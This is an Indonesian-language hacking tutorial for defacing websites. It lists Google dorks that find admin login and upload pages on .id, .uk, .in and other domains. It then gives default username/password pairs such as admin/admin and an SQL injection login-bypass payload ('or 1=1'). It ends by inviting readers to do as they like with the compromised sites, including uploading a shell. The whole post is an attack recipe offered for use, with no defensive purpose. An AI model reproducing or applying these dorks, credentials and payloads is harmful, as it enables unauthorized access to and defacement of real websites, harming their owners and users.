Deface poc default admin login
Hai minna-san,kali ini saya akan share cara deface metode Default u/p.kata u/p itu username/password,jadi kita itu login pakai default username dan password.
Okeh,langsung aja
BAHAN:
-DORK
-INTERNET
-GOOGLE/CHROME
DORK:
-intitle:"login" /login.php
-intext:"Parent Directory"
-inurl:/admin/upload site:id /admin/uploads site:id /admin/ upload site:uk /admin/uploads site:uk /admin/upload/admin/panel/
-inurl:/login.aspx site:in intext:"members"
-inurl:/login inurl:/admin/dashboard.php
-intext"register" intitle:"login"
-inurl:/admin/images/files
-inurl:/admin/uploads/images
-inurl:/index.php intext:"username"
-intitle:"administrator" inurl:/index.php
-intext:"username" intitle:"login"
-inurl:/index.php intext:"password"
-intitle:"administrator" inurl:/index.php
-intext:"password" intitle:"login"
-inurl:/index.php intext:"username"
-intitle:"panel" inurl:/login.php
-intext:"username" intitle:"panel"
-inurl:/login.php intext:"password"
-intitle:"panel" inurl:/login.php
-intext:"username" intitle:"login"
-inurl:/login.php intext:"password"
-intitle:"login" inurl:/login.php intext:"user" site:in /login.html intitle:"admin" /login.html
-intitle:"admin" site:in /login.html
-intitle:"admin" site:id /login.html
-intitle:"admin" site:uk /login.html intitle:"admin" site:za /loin.html
-intitle:"admin" site:i/login.html
-intitle:"admin" site:pl intext:"login"
-intext:"please login" site:in intext:"login succesfuly" site:in
LANGKAH":
-Pertama kalian ngedork dulu dengan cara salin salah satu dork diatas,terus tempel dan search di Google kesayangan,Trs pilih salah satu web
-nah nanti pasti langsung ke Tempat login,
-Setelah itu kalian login dengan default User dan pass nya nih
*Def U/P :
- admin/admin
- admin/admin123
-admin/pass
- administrator/administrator
*Bypas SQL login :
- U/P: ' or 1=1 limit 1 -- -+
"Kalo itu user sama pass nya sama"
-Kalian cobain login 1 per 1 dengan itu,Yang warna merah itu bagian Username dan Yang warna biru itu bagian Password
*Kalo masuk ke Dashboard web nya,berarti berhasil y,
-Kalo sudah masuk ke dahboard nya,terserah mau diapain tu web :).
Kalian bisa upshell, dll
Akhir kata
Dah lah segitu aja...
BYE...